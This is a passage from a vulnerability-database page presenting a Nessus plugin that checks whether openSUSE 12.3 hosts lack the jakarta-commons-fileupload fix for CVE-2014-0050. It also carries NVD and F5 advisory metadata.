ID OPENSUSE-2014-297.NASL Type nessus Reporter This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2014-06-13T00:00:00
Description
This jakarta-commons-fileupload update fixes the following security
and non-security issues :
bnc#862781: Fixed buffer overflow and resulting DoS
(CVE-2014-0050).
Removed gcj part and deprecated macros.
Moved from jpackage-utils to javapackage-tools.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from openSUSE Security Update openSUSE-2014-297.
#
# The text description of this plugin is (C) SUSE LLC.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
# Registration phase: when the plugin is loaded with `description` set, only
# the metadata below is declared and the script exits before any host check.
if (description)
{
  # Plugin identity and revision.
  script_id(75324);
  script_version("1.6");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");

  # Vulnerability identifiers this plugin is indexed under.
  script_cve_id("CVE-2014-0050");
  script_bugtraq_id(65400);

  script_name(english:"openSUSE Security Update : jakarta-commons-fileupload (openSUSE-SU-2014:0528-1)");
  script_summary(english:"Check for the openSUSE-2014-297 patch");

  script_set_attribute(attribute:"synopsis", value:"The remote openSUSE host is missing a security update.");

  # The description is the distribution's advisory text (see the file header).
  # It calls the issue a buffer overflow; the NVD summary quoted on this page
  # describes CVE-2014-0050 as an infinite loop / CPU-consumption denial of
  # service in MultipartStream.java, reached through a crafted Content-Type
  # header. Read findings from this plugin as an availability problem.
  script_set_attribute(
    attribute:"description",
    value:
"This jakarta-commons-fileupload update fixes the follwoing security
and non security issues :
- bnc#862781: Fixed buffer overflow and resulting DoS
(CVE-2014-0050).
- Removed gcj part and deprecated macros.
- Moved from jpackage-utils to javapackage-tools."
  );

  # References, in the order they are reported.
  script_set_attribute(attribute:"see_also", value:"https://bugzilla.novell.com/show_bug.cgi?id=862781");
  script_set_attribute(attribute:"see_also", value:"https://lists.opensuse.org/opensuse-updates/2014-04/msg00041.html");

  script_set_attribute(attribute:"solution", value:"Update the affected jakarta-commons-fileupload packages.");

  # The base vector matches the 7.5 (C:P/I:P/A:P) in the NVD record on this
  # page. NVD notes that its initial assessment was 5.0 (A:P only) and was
  # raised to reflect impact on Oracle products.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:ND/RL:OF/RC:C");

  # NOTE(review): these two attributes state that no exploit is known, while
  # the related-references list on this page carries exploitdb and metasploit
  # entries for the same CVE. Treat the exploitability fields as possibly
  # stale when prioritising remediation.
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");

  # Declared as a local check; it requires the Host/SuSE/* KB keys listed
  # under script_require_keys below.
  script_set_attribute(attribute:"plugin_type", value:"local");

  # Scope: the two openSUSE packages and the 12.3 release only.
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:jakarta-commons-fileupload");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:jakarta-commons-fileupload-javadoc");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:12.3");

  script_set_attribute(attribute:"patch_publication_date", value:"2014/04/04");
  script_set_attribute(attribute:"plugin_publication_date", value:"2014/06/13");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"SuSE Local Security Checks");

  # ssh_get_info.nasl is declared as a prerequisite; presumably it populates
  # the KB keys required on the next line -- confirm against that script.
  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list");

  exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
# Check phase: decide from knowledge-base data whether the host still carries
# a jakarta-commons-fileupload build older than the fixed one.
#
# Scope caveat: only the two openSUSE 12.3 RPMs named below are evaluated.
# Copies of Commons FileUpload bundled inside other software are not covered
# (the Apache advisory quoted on this page notes that Tomcat 7 and 8 ship a
# renamed copy), so they need their own detection.

# Preconditions: each failed precondition is reported through audit().
# NOTE(review): audit() presumably ends the plugin run -- confirm in audit.inc.
if (!get_kb_item("Host/local_checks_enabled"))
  audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);

release = get_kb_item("Host/SuSE/release");

# No release string, or a SLED/SLES release, is reported as "not openSUSE".
if (isnull(release) || release =~ "^(SLED|SLES)")
  audit(AUDIT_OS_NOT, "openSUSE");

# Only openSUSE 12.3 is in scope for this advisory.
if (release !~ "^(SUSE12\.3)$")
  audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "12.3", release);

# Without the collected RPM list there is nothing to compare against.
if (!get_kb_item("Host/SuSE/rpm-list"))
  audit(AUDIT_PACKAGE_LIST_MISSING);

# Both packages are always checked; flag counts the checks that hit.
# NOTE(review): rpm_check() presumably returns true when the installed package
# is older than `reference` -- confirm in rpm.inc.
flag = 0;

if (rpm_check(release:"SUSE12.3", reference:"jakarta-commons-fileupload-1.1.1-114.8.1"))
  flag++;
if (rpm_check(release:"SUSE12.3", reference:"jakarta-commons-fileupload-javadoc-1.1.1-114.8.1"))
  flag++;

if (!flag)
{
  # Nothing flagged: report either "not affected" with the list of packages
  # that were tested, or "not installed" when no package was tested.
  tested = pkg_tests_get();
  if (tested)
    audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else
    audit(AUDIT_PACKAGE_NOT_INSTALLED, "jakarta-commons-fileupload / jakarta-commons-fileupload-javadoc");
}
else
{
  # At least one package flagged: raise the finding on port 0, attaching the
  # RPM report only when report verbosity is above zero.
  if (report_verbosity > 0)
    security_hole(port:0, extra:rpm_report_get());
  else
    security_hole(0);
  exit(0);
}
{"id": "OPENSUSE-2014-297.NASL", "bulletinFamily": "scanner", "title": "openSUSE Security Update : jakarta-commons-fileupload (openSUSE-SU-2014:0528-1)", "description": "This jakarta-commons-fileupload update fixes the follwoing security\nand non security issues :\n\n - bnc#862781: Fixed buffer overflow and resulting DoS\n (CVE-2014-0050).\n\n - Removed gcj part and deprecated macros.\n\n - Moved from jpackage-utils to javapackage-tools.", "published": "2014-06-13T00:00:00", "modified": "2014-06-13T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/75324", "reporter": "This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://lists.opensuse.org/opensuse-updates/2014-04/msg00041.html", "https://bugzilla.novell.com/show_bug.cgi?id=862781"], "cvelist": ["CVE-2014-0050"], "type": "nessus", "lastseen": "2021-01-20T12:27:30", "edition": 18, "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-0050"]}, {"type": "f5", "idList": ["SOL15189", "F5:K15189"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:30435", "SECURITYVULNS:DOC:32033", "SECURITYVULNS:VULN:14470"]}, {"type": "openvas", "idList": ["OPENVAS:867523", "OPENVAS:1361412562310807039", "OPENVAS:1361412562310702856", "OPENVAS:702856", "OPENVAS:1361412562310804251", "OPENVAS:1361412562310850747", "OPENVAS:1361412562310867519", "OPENVAS:1361412562310867523", "OPENVAS:867519", "OPENVAS:1361412562310120359"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-2856.NASL", "WEBSPHERE_PORTAL_CVE-2014-0050.NASL", "VMWARE_ORCHESTRATOR_VMSA_2014_0007.NASL", "TOMCAT_8_0_3.NASL", "REDHAT-RHSA-2014-0253.NASL", "ALA_ALAS-2014-312.NASL", "F5_BIGIP_SOL15189.NASL", "VMWARE_ORCHESTRATOR_APPLIANCE_VMSA_2014_0007.NASL", "MANDRIVA_MDVSA-2014-056.NASL", "TOMCAT_7_0_52.NASL"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2897-1:13B38", 
"DEBIAN:DSA-2856-1:D2DA2"]}, {"type": "fedora", "idList": ["FEDORA:EA6192175F", "FEDORA:58AC321FC4"]}, {"type": "exploitdb", "idList": ["EDB-ID:31615"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CONF-32557", "ATLASSIAN:CONFSERVER-32557"]}, {"type": "amazon", "idList": ["ALAS-2014-312", "ALAS-2014-344"]}, {"type": "seebug", "idList": ["SSV:84935", "SSV:61443"]}, {"type": "suse", "idList": ["SUSE-SU-2014:0548-1"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:EB000848EE6583FA3B8F33FA4CDD34C0"]}, {"type": "redhat", "idList": ["RHSA-2014:0527", "RHSA-2014:0528", "RHSA-2014:0525", "RHSA-2014:0526", "RHSA-2014:0459", "RHSA-2014:0252", "RHSA-2014:0429", "RHSA-2014:0253", "RHSA-2014:0865"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/DOS/HTTP/APACHE_COMMONS_FILEUPLOAD_DOS"]}, {"type": "github", "idList": ["GHSA-XX68-JFCG-XMMF"]}, {"type": "jvn", "idList": ["JVN:14876762"]}, {"type": "zdt", "idList": ["1337DAY-ID-21887"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20140707-01-STRUTS2"]}, {"type": "oraclelinux", "idList": ["ELSA-2014-0429", "ELSA-2014-0865", "ELSA-2014-0686"]}, {"type": "threatpost", "idList": ["THREATPOST:40B4CEF304ADBCA0734F292661E7810B"]}, {"type": "vmware", "idList": ["VMSA-2014-0007"]}, {"type": "ubuntu", "idList": ["USN-2130-1"]}, {"type": "centos", "idList": ["CESA-2014:0429", "CESA-2014:0865"]}], "modified": "2021-01-20T12:27:30", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-01-20T12:27:30", "rev": 2}, "vulnersScore": 7.5}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-297.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75324);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n 
script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n\n script_name(english:\"openSUSE Security Update : jakarta-commons-fileupload (openSUSE-SU-2014:0528-1)\");\n script_summary(english:\"Check for the openSUSE-2014-297 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This jakarta-commons-fileupload update fixes the follwoing security\nand non security issues :\n\n - bnc#862781: Fixed buffer overflow and resulting DoS\n (CVE-2014-0050).\n\n - Removed gcj part and deprecated macros.\n\n - Moved from jpackage-utils to javapackage-tools.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=862781\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-04/msg00041.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jakarta-commons-fileupload packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:jakarta-commons-fileupload\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:jakarta-commons-fileupload-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"jakarta-commons-fileupload-1.1.1-114.8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"jakarta-commons-fileupload-javadoc-1.1.1-114.8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-fileupload / jakarta-commons-fileupload-javadoc\");\n}\n", "naslFamily": "SuSE Local Security Checks", "pluginID": "75324", "cpe": ["cpe:/o:novell:opensuse:12.3", "p-cpe:/a:novell:opensuse:jakarta-commons-fileupload", "p-cpe:/a:novell:opensuse:jakarta-commons-fileupload-javadoc"], "scheme": null}
{"cve": [{"lastseen": "2020-12-09T19:58:19", "description": "MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions.\nThe previous CVSS assessment ( Base Score: 5.0 - AV:N/AC:L/AU:N/C:N/I:N/A:P) was provided at the time of initial analysis based on the best available published information at that time. The score has been updated to reflect the impact to Oracle products per <a href=http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html> Oracle Critical Patch Update Advisory - October 2015 </a>. Other products listed as vulnerable may or may not be similarly impacted.", "edition": 5, "cvss3": {}, "published": "2014-04-01T06:27:00", "title": "CVE-2014-0050", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0050"], "modified": "2018-10-09T19:35:00", "cpe": ["cpe:/a:apache:commons_fileupload:1.2.1", "cpe:/a:apache:tomcat:7.0.11", "cpe:/a:apache:tomcat:7.0.50", "cpe:/a:apache:tomcat:7.0.40", "cpe:/a:apache:tomcat:7.0.35", "cpe:/a:apache:tomcat:7.0.29", "cpe:/a:oracle:retail_applications:13.0", "cpe:/a:apache:tomcat:7.0.42", "cpe:/a:apache:tomcat:7.0.16", "cpe:/a:oracle:retail_applications:13.4", "cpe:/a:apache:commons_fileupload:1.2.2", "cpe:/a:apache:tomcat:7.0.32", "cpe:/a:apache:commons_fileupload:1.0", 
"cpe:/a:apache:tomcat:7.0.41", "cpe:/a:apache:tomcat:7.0.49", "cpe:/a:apache:tomcat:7.0.4", "cpe:/a:apache:tomcat:7.0.36", "cpe:/a:apache:tomcat:8.0.0", "cpe:/a:apache:tomcat:7.0.23", "cpe:/a:oracle:retail_applications:13.1", "cpe:/a:apache:tomcat:7.0.37", "cpe:/a:apache:tomcat:7.0.46", "cpe:/a:apache:tomcat:7.0.20", "cpe:/a:apache:tomcat:7.0.3", "cpe:/a:apache:tomcat:7.0.48", "cpe:/a:apache:tomcat:7.0.7", "cpe:/a:apache:tomcat:7.0.24", "cpe:/a:oracle:retail_applications:13.3", "cpe:/a:apache:tomcat:7.0.28", "cpe:/a:apache:tomcat:7.0.44", "cpe:/a:apache:tomcat:7.0.27", "cpe:/a:apache:tomcat:7.0.45", "cpe:/a:apache:tomcat:7.0.13", "cpe:/a:apache:tomcat:7.0.0", "cpe:/a:oracle:retail_applications:12.0", "cpe:/a:apache:tomcat:7.0.15", "cpe:/a:apache:tomcat:7.0.2", "cpe:/a:apache:tomcat:7.0.25", "cpe:/a:oracle:retail_applications:14.0", "cpe:/a:apache:tomcat:7.0.12", "cpe:/a:apache:commons_fileupload:1.2", "cpe:/a:apache:tomcat:7.0.38", "cpe:/a:apache:tomcat:7.0.18", "cpe:/a:apache:commons_fileupload:1.1", "cpe:/a:apache:tomcat:7.0.30", "cpe:/a:apache:tomcat:7.0.22", "cpe:/a:apache:tomcat:7.0.26", "cpe:/a:apache:tomcat:7.0.19", "cpe:/a:apache:tomcat:7.0.33", "cpe:/a:apache:commons_fileupload:1.1.1", "cpe:/a:oracle:retail_applications:13.2", "cpe:/a:apache:tomcat:7.0.17", "cpe:/a:apache:tomcat:7.0.5", "cpe:/a:apache:tomcat:7.0.39", "cpe:/a:apache:tomcat:7.0.9", "cpe:/a:apache:tomcat:7.0.1", "cpe:/a:apache:tomcat:7.0.8", "cpe:/a:apache:tomcat:7.0.47", "cpe:/a:apache:tomcat:7.0.34", "cpe:/a:apache:tomcat:7.0.6", "cpe:/a:apache:tomcat:7.0.14", "cpe:/a:apache:tomcat:7.0.21", "cpe:/a:oracle:retail_applications:12.0in", "cpe:/a:apache:commons_fileupload:1.3", "cpe:/a:apache:tomcat:7.0.10", "cpe:/a:apache:tomcat:7.0.31", "cpe:/a:apache:tomcat:8.0.1", "cpe:/a:apache:tomcat:7.0.43"], "id": "CVE-2014-0050", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0050", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": 
["cpe:2.3:a:apache:tomcat:7.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_applications:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:commons_fileupload:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.50:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.44:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.34:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_applications:13.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.30:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.38:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.43:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:commons_fileupload:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.24:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.33:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.49:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.48:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:apache:commons_fileupload:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.29:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.39:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.31:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_applications:14.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.27:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.42:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.35:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.2:beta:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_applications:13.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.46:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.4:beta:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.36:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.22:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.9:*:*:*:*:*:*:*", 
"cpe:2.3:a:apache:tomcat:7.0.45:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:commons_fileupload:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.37:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_applications:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:commons_fileupload:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.47:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.0:beta:*:*:*:*:*:*", "cpe:2.3:a:apache:commons_fileupload:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.26:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.19:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_applications:12.0in:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.41:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.0:rc10:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:commons_fileupload:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_applications:13.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.32:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.21:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.40:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_applications:13.4:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2019-07-02T20:43:47", "bulletinFamily": "software", "cvelist": ["CVE-2014-0050"], "description": "\nF5 Product Development has assigned ID 452318 (BIG-IP) and ID 452803 (Enterprise Manager) to this vulnerability. 
Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H455619 on the **Diagnostics **> **Identified **> **High **screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM| 11.0.0 - 11.5.4 \n10.0.0 - 10.2.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP AAM| 11.4.0 - 11.5.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10| Configuration utility \nBIG-IP AFM| 11.3.0 - 11.5.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10| Configuration utility \nBIG-IP Analytics| 11.0.0 - 11.5.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP APM| 11.0.0 - 11.5.4 \n10.1.0 - 10.2.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP ASM| 11.0.0 - 11.5.4 \n10.0.0 - 10.2.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| 11.2.1 HF16| Configuration utility \nBIG-IP GTM| 11.0.0 - 11.5.4 \n10.0.0 - 10.2.4| 11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP Link Controller| 11.0.0 - 11.5.4 \n10.0.0 - 10.2.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP PEM| 11.3.0 - 11.5.4| 12.1.0 \n12.0.0 \n11.6.1 \n11.6.0 \n11.5.4 HF2 \n11.4.1 HF10| Configuration utility \nBIG-IP PSM| 11.0.0 - 11.4.1 \n10.0.0 - 10.2.4| 11.4.1 HF10 \n11.2.1 HF16| Configuration utility \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0 \n10.0.0 - 
10.2.4| 11.2.1 HF16| Configuration utility \nBIG-IP WOM| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| 11.2.1 HF16| Configuration utility \nARX| None| 6.0.0 - 6.4.0| None \nEnterprise Manager| 3.0.0 - 3.1.1 \n2.1.0 - 2.3.0| None| Configuration utility \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| None\n\nIf you are running a version listed in the **Versions known to be vulnerable **column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you should permit access to the Configuration utility only over a secure network.\n\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents.](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "edition": 1, "modified": "2018-02-06T01:03:00", "published": "2014-04-19T00:53:00", "id": "F5:K15189", "href": "https://support.f5.com/csp/article/K15189", "title": "Apache Commons FileUpload vulnerability CVE-2014-0050", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2016-09-26T17:22:52", "bulletinFamily": "software", "cvelist": ["CVE-2014-0050"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to 
